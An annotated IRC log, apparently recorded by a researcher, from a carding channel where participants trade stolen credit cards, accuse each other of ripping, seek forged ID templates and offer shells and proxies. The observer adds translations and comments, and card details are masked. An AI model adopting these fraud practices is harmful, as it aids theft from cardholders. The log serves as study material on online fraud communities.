      :D1ck :but not one's that end with zzz
      :D1ck :like dreamzzz.net
      :D1ck :etc
      :D1ck :eeet.org
      :D1ck :eeet.net
      :D1ck :oye
      :D1ck :how much j0e paid
      :D1ck :and what server?
      :J4n3 :he paid 250 $
      :J4n3 :from example.net
      :D1ck :kewl
      :D1ck :for a T3?
      :J4n3 :and yeah example.org  and com net all available :p
      :J4n3 :T1 i think
      :D1ck :kewl
      :D1ck :get me please
      :D1ck :oh
      :J4n3 :yaar CC :(
      :J4n3 :no CC right now 
      :J4n3 :yaar u have that bind weapon why dont u hit a big shoping site and take cc's ?
      
      (Note:: here's where they hatch the idea of stealing CCs)
      
      :D1ck :yep
      :D1ck :oki
      :D1ck : welp why dont we all hang in 
      :D1ck :it was my channel and i think ti still is
      :J4n3 :abay yaar sub fraud hotha hai wahan par
      
      hey dude, a lot of fraud goes on there
      
      :J4n3 :their CC's do not work
      :D1ck :hehe
      :J4n3 :bauth try kiya hai undernet and effnet par
      
      tried a lot on undernet and effnet
      
      :D1ck :k
      :D1ck :heh k
      :D1ck :<shellad:#shellz> DIGITALINET offers quality web hosting staring at 6$ a
      :D1ck :                  month. Signup for webhosting with digitalinet and get your
      :D1ck :                  domain for 11$ a year
      :D1ck :                  information.
      :D1ck :i`ll buy 2 legit domains there
      :J4n3 :haha i had a shell from there
      :D1ck :kewl
      :J4n3 :they closed shell service now 
      :J4n3 :adult web hosting :p
      :D1ck :lol
      :J4n3 :service achee thee buree nahin thee
      
      the service was good, not bad at all
      
      :D1ck :haha
      :J4n3 :oye sex time
      :J4n3 :brb
      :J4n3 :br
      :J4n3 :bbl
      :J4n3 :shayed so gaya
      
      seems like he's gone to sleep
      
      :D1ck :ahahahha
      :J4n3 :hehe
      :J4n3 :g0ne
      :D1ck :.join 
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :L4stly :Does anyone here have any working Credit Card numbers with full details ?
      :^w1nX^ :cc
      :^w1nX^ :cc
      :^w1nX^ :sleepin chann
      :^w1nX^ :trade
      :^w1nX^ :sleepin chann
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :trade
      :atlanta.ga.us.undernet.org 005 spitz SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :nirvana19 :e cinevA de aici si pe rocarding?
      @ is somebody here also on #rocarding?
      
      (Note:: definitely not urdu here)
      
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :^w1nX^ :ping me
      :Bl4ck_ :not again
      :Bl4ck_ :-up
      :nirvana19 :I buy stuff
      :SLaZz :who wants to trade cc's ??
      :nirvana19 :gfnbfg
      :nirvana19 :someone from romania?
      :savantul :yes
      :_Mephisto :multi
      @ a lot of (people)
      :_Mephisto ::)
      :nirvana19 :aveti ceva marfa?
      @do you have some stuff?
      
      (Note:: ??)
      
      :nirvana19 :cumpar
      @ I buy
      
      :_CardMan_ :re ppl
      :Bl4ck_ :arrrrrrrrrrrrrrrrr
      :Bl4ck_ :-up
      :_CardMan_ :what is new ?
      :Bl4ck_ :shitttttttttttttt
      :_CardMan_ :stupid bots
      :Bl4ck_ :-up
      :Bl4ck_ :-up
      :_CardMan_ :this is fun....
      :Bl4ck_ :Omblad0n up
      :Bl4ck_ :Omblad0n op
      :Bl4ck_ ::>>
      :Bl4ck_ :arrrrrr
      :_CardMan_ :Bl4ck_....do u know what u r doing ?
      :Bl4ck_ :dunoo
      :_CardMan_ :i saw....
      :_CardMan_ :so ... any romanian people here ?
      :bug____ :ops
      :_CardMan_ :bug____...whats up ?
      :savantul :lots
      :bug____ :nimic man
      @ nothing man
      
      :_CardMan_ :ok...
      :bug____ :I need cc
      :bug____ :lol
      :_Mephisto :me too
      :_CardMan_ :pai care e din bucale si are niste cc-uri bune (NU bunicele, sau extrapolate) sa initieze o privata repede....
      @ so, those who are from Bucharest and who have some good cc (NOT "good enough" or extrapolated), let's start fast "a private one" (conversation) ...
      
      (Note:: ??)
      
      :nirvana19 :da o gramada de romanian pepole pe aici
      @ lots of romanian people here
      
      (Note:: ??)
      
      :bug____ :1 cc
      :bug____ :1
      :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede....
      @ so, those who are from Bucharest and who have some good cc, not bogus, let's start fast "a private one" (conversation) ...
      
      :_CardMan_ :care esti pe kappa (IP: 192.168.254.95
      :_CardMan_ :DNS: dialup-56k-95.example.xx
      :_CardMan_ :si dai cu scanarea ?
      @ who are you on kappa (IP: 192.168.254.95
      @ DNS: dialup-56k-95.example.xx ( kappa.ro ??)
      @ and are you scanning ?
      
      :nirvana19 :de unde pot sa fac rost de Legion 2.1
      @where can I get Legion 2.1
      
      :_Mephisto :de la mine
      @from me
      
      :_CardMan_ :nirvana19.... LOLZ... nu stiai ca are back door mah ?
      @ ...LOLZ... didn't you know that it has a backdoor?
      
      :nirvana19 :poti sa mi-l dai?
      @ could you give it to me?
      
      :dlotos33 :Is there any Romania friends?
      :bug____ :nope
      :dlotos33 :Is there any Romania friends?
      :_CardMan_ :a lots 
      :Co0lWoRx :any1 here wanna earn +v, msg me
      :Co0lWoRx :any1 here wanna earn +v, msg me
      :v|Adu :re 
      :v|Adu ::)
      :Co0lWoRx :ACTION any1 here wanna earn +v, msg me
      :v|Adu :anybody need a drop place ?
      :nirvana19 :de unde esti ma vladule?
      @ where are you from vladu?
      
      :_CardMan_ :v|Adu.... lasa-te de meserie ....
      @ ... got it lost ....
      
      :v|Adu ::)))))))
      :v|Adu :cardman 
      :v|Adu ::)
      :v|Adu :hahahahah
      :v|Adu ::)
      :_CardMan_ :suck it 
      
      (Note:: ?? - all this is either romanian or some other language)
      @ yes, this is romanian slang
      
      
      :Co0lWoRx :ACTION any1 here wanna earn +v, msg me
      :nirvana19 :sorry
      :Co0lWoRx :ok
      :Co0lWoRx :np
      :xroach :anybody have any driver license template ? 
      :xroach :anybody have any driver license templates ? 
      :bug____ :u can save my ass with  1 cc
      :xroach :actually any good templates would be nice
      :bug____ :I got some sites
      :v|Adu :re 
      :Co0lWoRks :ACTION any1 wanna earn +v in 
      :Co0lWoRks :ACTION any1 wanna earn a virgin card, msg me now
      :Co0lWoRks :ill bbl, since no one wants anything here
      :Bl4ck_ :-up
      :Bl4ck_ :?
      :Bl4ck_ :soory
      :Bl4ck_ :I`ll go
      :dlotos33 :anyone have CC?
      :s1z1f :yes
      :xroach :anyone have or know where i could get license templates or any templates for mag cards ? 
      :s1z1f :do enyone have cc?
      :dlotos33 :Does any one speak germany?
      :_CardMan_ :do not think so ...
      :2red :i speak some german
      :2red :why?
      :dlotos33 :What means "ORT" at GERMANY?
      :2red :city?
      :dlotos33 :thank you ,my friend
      :MaTiX_00 :hello
      :MaTiX_00 :anyone got a proxy for me to use?
      :dlotos33 :yes
      :SpRiTe^^^ :HI
      :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede....
      @ (idem)
      
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ : xxxx xxxx xxxx xxxx
      :SpRiTe^^^ :4,4 xxxx xxxx xxxx xxxx
      :SpRiTe^^^ :0,4 xxxx xxxx xxxx xxxx
      :SpRiTe^^^ :4,4 xxxx xxxx xxxx xxxx
      :SpRiTe^^^ :0,0 1,1 xxxx xxxx xxxx xxxx
      :kurky :Any GOOOOOOOD carders here? msg me
      :kurky :Anyone here got a UK cc??? Msg me
      :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA
      :][VaMpIrE :hi
      :][VaMpIrE :wanna trade?
      :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA
      :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede....
      @ (idem)
      
      :_CardMan_ :m4r1n4ru...salve mah 
      @ m4r1n4ru...hello man
      
      :m4r1n4ru :-op
      :xroach :anybody have any dl templates ? cia/fbi/nsa would be cool too
      :s1z1f :do enybody have cc?
      :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA
      :s1z1f :do enybody have cc?
      :[SK]Kane :care aveti un proxy bun de www?
      @ who has a good www proxy?
      
      :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede....
      @ (idem)
      
      :SpRiTe^^^ :H
      :SpRiTe^^^ :ok
      :m4r1n4ru :-op
      :s1z1f :do enybody have cc?
      :s1z1f :do enybody have cc?
      :dariuss :am yo 1000
      :s1z1f :do enybody have cc?
      :natedogg :i do..
      :s1z1f :pls give it to me
      :natedogg :trade...
      :natedogg :mgs me..
      :s1z1f :pls give it to me
      :s1z1f :do enybody have cc?
      :natedogg :sizif ---------------banned#no more trade kind.....
      :s1z1f :do enybody have cc?
      :s1z1f :pls give it to me
      :s1z1f :do enybody have cc?
      :pimpg :yeah
      :pimpg :if you would like one you have to send me one first
      :pimpg :then if it approves
      :s1z1f :ok
      :pimpg :i will send one to you
      :pimpg :sound good
      :pimpg :pm me if you would like me 2
      :D1ck :Tota1KaaS join #delusion
      :D1ck :Tota1KaaS say #delusion Ok, NOW introducing the the First Shell hosting company in pakitan, with excellent domains, Vhosts ip, bots, on a T3 HUB, coming soon.
      :D1ck :Tota1KaaS say #delusion If interested say on main, and one of the admins will message :)
      :D1ck :Tota1KaaS say #delusion Ok, NOW introducing the the First Shell hosting company in pakitan, with excellent domains, Vhosts ip, bots, on a T3 HUB, coming soon.
      :D1ck :Tota1KaaS say #delusion If interested say on main, and one of the admins will message :)
      :dariuss :Bl4ck_-))
      :Bl4ck_ :se man
      :s1z1f :*** pimpg (~ricky@exo01-ca.example.net) has joined 
      :s1z1f :*** Retrieving 
      :s1z1f :<s1z1f> do enybody have cc?
      :s1z1f :<s1z1f> pls give it to me
      :s1z1f :*** Retrieving 
      :s1z1f :*** natedogg has quit IRC (Signed off)
      :s1z1f :<s1z1f> do enybody have cc?
      :s1z1f :<pimpg> yeah
      :s1z1f :<pimpg> if you would like one you have to send me one first
      :s1z1f :<pimpg> then if it approves
      :Ghici :re ppl
      :pimpg :hello
      :pimpg :would anyone like to trade, i dont go first
      :D1ck :D4v3
      :D1ck :WHEN BACK MSG ME
      :s1z1f :do enybody have cc?
      :dariuss :ACTION c ya
      :m4r1n4ru :Away
      :m4r1n4ru :I have Returned.
      :m4r1n4ru :Away
      :s1z1f :do enybody have cc?
      :m4r1n4ru :Away
      :Bon_Jovi :m4r1n4ru 
      :s1z1f :do enybody have cc?
      :Bon_Jovi :yep
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :s1z1f :do enybody have cc?
      :m4r1n4ru :Away
      :D1ck :hey J4n3
      :J4n3 :what's new :p ?
      :D1ck :server
      :D1ck :buying
      :D1ck :but what did j0e say
      :D1ck :which is good one?
      :J4n3 :buying ? confirmed ?
      :D1ck :i got 10 domains
      
      (Note:: at this point i guess they have closed the deal with the previous CCs)
      
      :D1ck ::P
      :D1ck :freind bought them
      :D1ck :hreh
      :D1ck :yup
      :J4n3 :usay khud sahi nahi patha usnay sirf example try kiya hai aur wo sahi nahi laga usay
      
      he himself doesnt know really, he just tried example and it didnt look all right to him
      
      :D1ck :example.net sux?
      :D1ck :oh
      :J4n3 :great  
      :D1ck :(@J4n3): great
      :D1ck :?
      :J4n3 :haha u said friend already bought it ?
      :D1ck :domains
      :D1ck ::)
      :J4n3 :oh
      :J4n3 :but from where u planning to buy ?
      :D1ck :kuch samhaj nahi aa rahi
      
      cant understand anything
      
      :D1ck :where should i buy
      :D1ck :Server Space: Single Server
      :D1ck :IP Numbers: 30
      :D1ck :Bandwidth: 50 Gigs
      :D1ck :Services: Level 1 (Included)
      :D1ck :Monitor: 24/7 Network Monitoring (Included)
      :D1ck :--------------------------------------------------------------------------------
      :D1ck :Payment Plan: $2,182.80 paid Annually
      :D1ck :Setup Fee: $100.00
      :D1ck :--------------------------------------------------------------------------------
      :D1ck :Total Startup: $2,282.80
      :D1ck :SkyNetWEB Ltd.
      :D1ck :3500 Boston St.
      :D1ck :Baltimore Maryland, 21224
      :D1ck :Phone: 410.563.6384
      :D1ck :Fax: 410.563.5457
      :D1ck :Server Space: Single Server
      :D1ck :IP Numbers: 30
      :D1ck :Bandwidth: 50 Gigs
      :J4n3 :2,828 ?
      :D1ck :Services: Level 1 (Included)
      :D1ck :Monitor: 24/7 Network Monitoring (Included)
      :D1ck :--------------------------------------------------------------------------------
      :D1ck :Payment Plan: $2,182.80 paid Annually
      :D1ck :Setup Fee: $100.00
      :D1ck :--------------------------------------------------------------------------------
      :D1ck :Total Startup: $2,282.80
      :D1ck :SkyNetWEB Ltd.
      :D1ck :3500 Boston St.
      :D1ck :Baltimore Maryland, 21224
      :D1ck :Phone: 410.563.6384
      :D1ck :Fax: 410.563.5457
      :D1ck :yeah
      :D1ck :per year
      :D1ck ::(?
      :D1ck :or :?
      :J4n3 :but he got it about 800 $ total i think with all system p2 400 64 mb ram and 8.4 gb hd
      :D1ck ::)?
      :m4r1n4ru :Away
      :D1ck :but
      :D1ck :that was one month
      :D1ck :remmeber?
      :J4n3 :hmm
      :J4n3 :u mean thats all for one year ?
      :J4n3 :and u gonna pay for it ?
      :D1ck :tell me
      :D1ck :what should i do?
      :D1ck :i`m confewsed
      
      (Note:: you mean "confused"... kiddie)
      
      :J4n3 :yaar aaj raath tak wait karlo
      
      dude, wait till tonight
      
      :J4n3 :let me ask some more ppl
      :D1ck :oki
      :J4n3 :teeek haina ?
      
      it's ok with you, right?
      
      :J4n3 :i'll ask miller too
      :D1ck :oki
      :D1ck :ok
      :D1ck :my budget is 170-200/month
      :J4n3 :hmm k
      :D1ck :>Domain Name 1....: example.com
      :D1ck :>Domain Name 2....: example.com
      :D1ck :>Domain Name 3....: example.com
      :D1ck :>Domain Name 4....: example.com
      :D1ck :>Domain Name 5....: example.com
      :D1ck :>Domain Name 6....: example.com
      :D1ck :>Domain Name 7....: example.com
      :D1ck :>Domain Name 8....: example.com
      :D1ck :>Domain Name 9....: example.com
      :D1ck :>Domain Name 10...: example.com
      :D1ck :>Total............: $649.50
      :J4n3 :oh already registered ?
      :D1ck :yup
      :J4n3 :how many years ?
      :D1ck :1
      :J4n3 :thats expensive
      :J4n3 :wait
      :D1ck :who cares
      :D1ck :its cared
      :J4n3 :let me check
      :J4n3 :oh
      :J4n3 :then its ok but wait
      :D1ck :oki
      :D1ck :(Sephirot): I need help , SOme one can help me
      :J4n3 :heh
      :D1ck :=p
      :J4n3 :oye
      :D1ck :?
      :J4n3 :u could got those 10 domain for 2 years at 300 $   and for 5 years at 750 $
      :D1ck :kewl
      :D1ck :from where?
      :J4n3 :dotster
      :D1ck :dotster.com
      :D1ck :?
      :J4n3 :1 year: $15  2 year: $30 
      :J4n3 :5 year: $75 10 year: $150 
      :J4n3 ::)
      :J4n3 :yeah
      :D1ck :cool
      :D1ck ::P
      :J4n3 :we'll get more from there
      :D1ck :oki
      :D1ck :;)
      :D1ck :yaar
      
      dude
      
      :D1ck :i want the server
      :D1ck :b4d
      :D1ck :kuch samhaj nahin aa rahi
      
      cant understand anything
      
      :J4n3 :haha jald baazi math karo 
      
      haha, dont make haste
      
      :D1ck :oye who could make a kewl kewl kewl webpage for webhosting and shell accounts?
      :m4r1n4ru :Away
      :J4n3 :coz u going to pay from ur pocket
      :D1ck :lol oki
      :J4n3 :zara ache thara maaloom karnay do
      
      let's locate some good chap
      
      :D1ck :ok;)
      :J4n3 :page design karnay ka masla nahi wo hojayega dont worry
      
      dont worry about the page design problem, it shall be done
      
      :D1ck :oki kewl
      :D1ck ::)
      :D1ck :oye
      :J4n3 :i'm gonna open a cosmetics shop at tariq road :p
      :D1ck :1pani nay apna server liya tha or rent?
      
      has j0e bought the server or rented it?
      
      (Note:: aek in hindi/urdu - pronounce: ache... means one. so 1pani would be j0e that they
      always refer to)
      
      :J4n3 :yea ?
      :J4n3 :liya tha
      
      had bought it
      
      :D1ck :kewl hehe
      :D1ck ::/
      :D1ck ::/
      :J4n3 :agar thum kaho tho j0e kee baath karwatha hon thum say
      
      if you say so, i can tell you j0e's deal
      
      :D1ck :oh
      :J4n3 :usay kahonga thumain call karday
      
      i will ask him to call you
      
      :J4n3 :ok ?
      :D1ck :ok
      :D1ck :sure
      :D1ck ::)
      :D1ck :but after 9
      :D1ck :but after 9 pm
      :J4n3 :teeek hai phir khud hee pooch lena sub kuch
      
      ok then just ask him everything yourself
      
      :D1ck :coz i`ll be sleeping
      :J4n3 :hmm ok
      :D1ck :k;/
      :D1ck :;/
      :J4n3 ::)
      :J4n3 :tariq road , cosmetic shop, kewl kewl bachiyan *wink*
      
      bachiyan = chicks
      
      :D1ck :lol
      :D1ck :hahahaha
      :J4n3 :hehe yeah
      :J4n3 :have u seen that new building dolmen mall ?
      :D1ck ::P
      :D1ck :nop
      :m4r1n4ru :Away
      :J4n3 :hmm phir dekhna , its kewl and most beautiful market in karachi
      
      hmmm then take a look at it, it's cool and most beautiful market in karachi
      
      :J4n3 :yaar give me a kewl host , aisa jis main psybnc chalaon aur crash na ho, meray ziyad thar roots main make command work nahi kartha :(
      
      dude, give me a cool host, such that if we run psybnc on it, it doesnt crash.
      
      (Note:: i am having problems with some urdu words, but the word-by-word translation for
      the rest of it is:
      
      meray = mine
      main = in
      nahi = doesnt
      kartha = happens
      
      the last part is.."make command doesnt work in this")
      
      :D1ck ::))
      :D1ck :oh
      :D1ck :i will send u psybnc-compiled
      :D1ck :when i boot
      :D1ck ::)
      :D1ck :(g|nger`): plus others
      :D1ck :(g|nger`): you can have whatever vhosts you want
      :D1ck :kewl?
      :m4r1n4ru :Away
      :J4n3 :yeah kewl
      :D1ck :PHAT6
      :D1ck :;pp
      :J4n3 :if we have domains, we can have vhost of whatever we like
      :D1ck :yaar is it possibl that u can help me with wrebpage :P?
      :D1ck :i cant do alone, coz i have 0-webpage skilzl
      :D1ck :hehe
      :J4n3 :yeah yeah i'm with u always
      :J4n3 ::)
      :D1ck :iknowheh
      :J4n3 :dont feel ur self alone
      :D1ck :kool:)
      :D1ck :kleet
      :J4n3 ::)
      :D1ck :aur sunao
      
      so what else is new?
      
      :D1ck :what haWt
      :J4n3 :nutthin hot naveed nay chars maanga hai hehe
      
      nothing's hot. naveed has asked for some marijuana (chars = marijuana/pot)
      
      :D1ck :HAHAHAHAAHAHA
      :J4n3 :hehehe yeah
      :D1ck :woh charas peeta hai? apni girlfreind ka chakroon may juis nay is ko ghaas nahindali?
      
      does he do marijuana? (Note:: something about his girlfriend being involved in marijuana too)
      
      :D1ck :ROFL
      :J4n3 :lol 
      :D1ck ::)
      :D1ck ::)
      :J4n3 :hah chars tho shroo say peetha hai pehlay bee main day chuka hon usko
      
      hah. he was having marijuana since the beginning. earlier i had given him some too
      
      :D1ck :lol
      :D1ck :oki
      :D1ck :tum charas latay hoon?
      
      do you also do marijuana?
      
      :[Agent] :anyone wants to have proxy list, cc list, RH bash shell eggable..msg me if ur serious
      :J4n3 :haan , i have many relations with drug mafia hehe
      :D1ck :(if answer=yes) { d4v3== "should not take" else printf ("its ok\n");
      :D1ck :lol
      :Flapjack- :Anyone trade cc for bnc? Msg me
      :D1ck :char drugs[80]'
      :D1ck :char drugs[80];
      :J4n3 :hehe
      :J4n3 :lol
      :D1ck ::)
      :J4n3 :main bee peetha hon kabee kabee mood hoay par
      
      i have some depends on the mood
      
      :D1ck :oh
      :D1ck :(@|S4n4m|): wasalamz
      
      salutations
      
      :D1ck :(sawera): w/salam
      :D1ck :chix?
      :D1ck :bawt?
      :J4n3 :yup |S4n4m| = mine
      :D1ck :hahaa
      :D1ck :all-chicks = yure
      :dmonchild :ACTION i am selling hardware if your intrested please /msg me for prices thanks
      :J4n3 :<|S4n4m|> key tum ko kuch kam karna hay
      
      hey do you want to do some work?
      
      :J4n3 :> thum falsafi kub say ban gayee ?
      
      since when did you become a philosopher?
      
      :J4n3 :<|S4n4m|> jab sey tum sey bat ki hay
      
      since the time i've started talking to you
      
      :J4n3 :aaaaahhhhhhhhhh
      :D1ck :hhaha
      :D1ck ::P
      :D1ck :mv logs.txt bhabi.txt
      
      (Note:: bhabi = sister-in-law)
      
      :J4n3 :lol
      :J4n3 :oye
      :D1ck :<bhab> cat bhabi.txt
      :D1ck :<bhabi> I WILL KILL U D4v3
      :D1ck :?
      :J4n3 :muhahahahahhahahahahhhaa
      :J4n3 :HHAHAHAHAHAHAH
      :D1ck ::)
      :J4n3 :heheheheh
      :J4n3 :ROFLMAO
      :D1ck :(:
      :J4n3 :ROFLMAO
      :D1ck :=P
      :m4r1n4ru :Away
      :dmonchild :ACTION i am selling hardware if your intrested please /msg me for prices thanks
      :m4r1n4ru :Away
      :Dariox :who trade cc
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :[Agent] :anyone can card me a laptop?
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :telnet- :anyone can card me a shell or web domain....pls answer to me
      :m4r1n4ru :Away
      :[Agent] :wanna trade
      
      -=-
      
      Day 13 June 16
      
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :D1ck! :Anyone have any "Gold-Line" Canadian Calling card #'s ??
      :m4r1n4ru! :Away
      :[4g3nt]! :anyone can tell how to use a company credit card ????
      :m4r1n4ru! :Away
      :TanTouze! :hi goober... oops wrong window
      :Ricky! :if someone would like to xchange cards contact me
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :Co0lWoRx! :yo m4r1n4ru, stop it pls
      :Co0lWoRx! :yo m4r1n4ru, stop it pls
      :Co0lWoRx! :yo m4r1n4ru, stop it pls
      :Co0lWoRx! :yo m4r1n4ru, stop it pls
      :Co0lWoRx! :damn it, im tired of all this shit
      :Co0lWoRx! :ok?
      :Ricky! :ii have 2 cards i will trade 
      :Ricky! :i dont go first
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :ABA! :Anyone want to trade cards?
      :ABA! :Anyone want to trade cards?
      :m4r1n4ru! :Away
      :ABA! :Anyone want to trade cards? (msg me now)
      :AlfonsoD! :im trading too
      :ABA! :msg me AlfonsoD
      :AlfonsoD! :anyone trading?
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :ABA! :Anyone trading cards?
      :ABA! :No one trade with D4r1u55
      :ABA! :Hes a ripper
      :ABA! :No one trade with D4r1u55
      :ABA! :Hes a ripper
      :[4g3nt]! :yo
      :[4g3nt]! :is a master card a 16 digit or 13 ?
      :ABA! :16
      :D4r1u55! :?
      :ABA! :xxxx/xxxx/xxxx/xxxx
      :ABA! :No one trade with D4r1u55
      :ABA! :Hes a ripper
      :D4r1u55! :wow
      :D4r1u55! :ABA
      :D4r1u55! :look here
      :D4r1u55! :[10:24] <D4r1u55> Not Approved: Customer information invalid. 
      :D4r1u55! :[10:24] <D4r1u55>      Not Approved: Invalid Credit Card Number. 
      :D4r1u55! :u give me 2 cc's.but are not viabils
      :D4r1u55! :[10:11] <ABA> <ABA> Dick xxxxxxx
      :D4r1u55! :[10:11] <ABA> <ABA> xxx St Example St
      :D4r1u55! :[10:11] <ABA> <ABA> Somewhere US
      :ABA! :I gave you two working CCs
      :ABA! :then
      :ABA! :you try to send me
      :ABA! :some bullshit
      :D4r1u55! :10:11] <ABA> <ABA> 10320
      :D4r1u55! :[10:11] <ABA> <ABA> 06/200x
      :D4r1u55! :[10:11] <ABA> <ABA> Mastercard.
      :D4r1u55! :[10:11] <ABA> <ABA> xxxx xxxx xxxx xxxx
      :D4r1u55! :[10:11] <ABA> .
      :ABA! :1.2meg html file
      :D4r1u55! :[10:11] <ABA> John Salvo
      :ABA! :fucking thief
      :ABA! :No one trade with D4r1u55
      :ABA! :Hes a ripper
      :D4r1u55! :[10:11] <ABA> 1175 Example Ave
      :D4r1u55! :[10:11] <ABA> 33146
      :D4r1u55! :[10:11] <ABA> VISA
      :D4r1u55! :10:11] <ABA> VISA
      :D4r1u55! :[10:11] <ABA> 12/200x
      :D4r1u55! :[10:11] <ABA> xxxxxxxxxxxxxxxx
      :D4r1u55! :and that's all
      :ABA! :you lame gimp
      :ABA! :youve got them the wrong way round
      :ABA! :thief
      :ABA! :No one trade with D4r1u55
      :ABA! :Hes a ripper
      :m4r1n4ru! :Away
      :D4r1u55! :that two cc's u send to me
      :D4r1u55! :and are'nt good
      :D4r1u55! :dont work
      :D4r1u55! :try to understand
      :D4r1u55! :whatever
      :[4g3nt]! :how can i card a company cc?
      :ABA! :No one trade with D4r1u55
      :ABA! :Hes a ripper
      :[4g3nt]! :hihi
      :[4g3nt]! :anyone can tell me how to use a company owned cc??
      :m4r1n4ru! :Away
      :Emy__! :I need some Cc `z (Visa)
      :Emy__! :...
      :ABA! :Anyone want to trade cards, msg me.
      :Emy__! :I need some credit cards .... Visa
      :ABA! :Emy MSG me then
      :m4r1n4ru! :Away
      :D4r1u55! :ACTION plek pa
      :J4n3! :nettlink
      :ABA! :ANYONE want to trade cards?
      :Emy__! :I need some credit cards .... Visa
      :ABA! :Message me then you fucking idiot
      :ABA! :how many more times
      :m4r1n4ru! :Away
      :2red! :ACTION is selling virgin credit cards, /msg me for deal.
      :ABA! :ANYONE want to trade cards? Msg me
      :ABA! :ANYONE want to trade cards? Msg me
      :[4g3nt]! :fuck ABA <<< ripper 
      :[4g3nt]! :fuck ABA <<< ripper 
      :[4g3nt]! :fuck ABA <<< ripper 
      :Emy__! :I need some credit cards .... Visa
      :m4r1n4ru! :Away
      :ABA! :ANYONE want to trade cards? Msg me
      :ABA! :ANYONE want to trade cards? Msg me
      :m4r1n4ru! :Away
      :Emy__! :anybody want to give me a cc ??
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :ABA! :Anyone want to trade cards?
      :sunfire! :
      :ABA! :Anyone want to trade cards?
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :connex! :anyone can help me to buy a shell?
      :m4r1n4ru! :Away
      :m4r1n4ru! :I have Returned.
      :m4r1n4ru! :-op
      :sunfire! : :-)
      :|DONNIE|! :ne1 have BNC...i have virgin..
      :|DONNIE|! :lets trade
      :DuXO! :hi to all
      :Razzorz! :anyone have bnc
      :Razzorz! :anyone have bnc?
      :Razzorz! :please tell me about bnc
      :DuKso! :hi anyone alive?
      :2red! :nope
      :DuKso! :how are u 2red :)
      :DuKso! :where are u from?
      :2red! :<- mortie/lita
      :DuKso! :hi man
      :DuKso! ::)
      :DuKso! :what are u doing:)
      :2red! :nothing
      :2red! :just listening to music
      :Nic[EQ]! :ACTION is trading Visas and MCs, looking for more or for shells
      :Emy__! :I need some cc `s (I do not have any )
      :FooDSt4mP! :anybody have any visa's?  i need to get a plane tick for a chick who's being abused by her husband
      :FooDSt4mP! :ill trade shells and dialup accounts for a visa/cc
      :[St0rM]! :hahahah
      :FooDSt4mP! :dude its not funny
      :FooDSt4mP! :its sad
      :FooDSt4mP! :i know it sounds like good bs for a card but its not..
      :MonTs! :what sort of shells?
      :FooDSt4mP! :aragorn.example.net
      :FooDSt4mP! :its a linux box.. rh 6.1... 6 bg's... 250 meg quota...
      :MonTs! :how many BG process?
      :FooDSt4mP! :redundant t3 conn
      :FooDSt4mP! :6 bg's
      :MonTs! :what's the http address?
      :FooDSt4mP! :no http.. its a private shell off a friends companies box
      :FooDSt4mP! :example.net is the isp
      :FooDSt4mP! :aragorn.example.net is the telnet addy
      :FooDSt4mP! :i just need some cc to get a damn ticket for this girl man
      :FooDSt4mP! :msg me if you wanna trade
      :pFFt--! :ACTION any1 wanna trade virgin cc's? msg me for fair trade (rippers go away)
      :pFFt--! :ACTION any1 wanna trade virgin cc's? msg me for fair trade (rippers go away)
      :2red! :pFFt--
      :Neon! :Have some cc...
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :2red! :we hear you
      :2red! :stop it
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :kurky! :I need someone to do me a favour....
      :kurky! :ull get a few virgin visa's
      :m4r1n4ru! :-join #rocarding
      :m4r1n4ru! :-save
      :glipy! :bah
      :glipy! :care-mi zice shi mie un site de un sa cumpar tembelfoane
      :glipy! :hap
      :glipy! :?
      :^W! :ACTION is trading ccz msg me for trade
      :wizz! :hey tabacu
      :TanTouze! :ok I'm here, now what were you saying?
      :NiCeBoY! :ello
      :NiCeBoY! :wers coolworx?
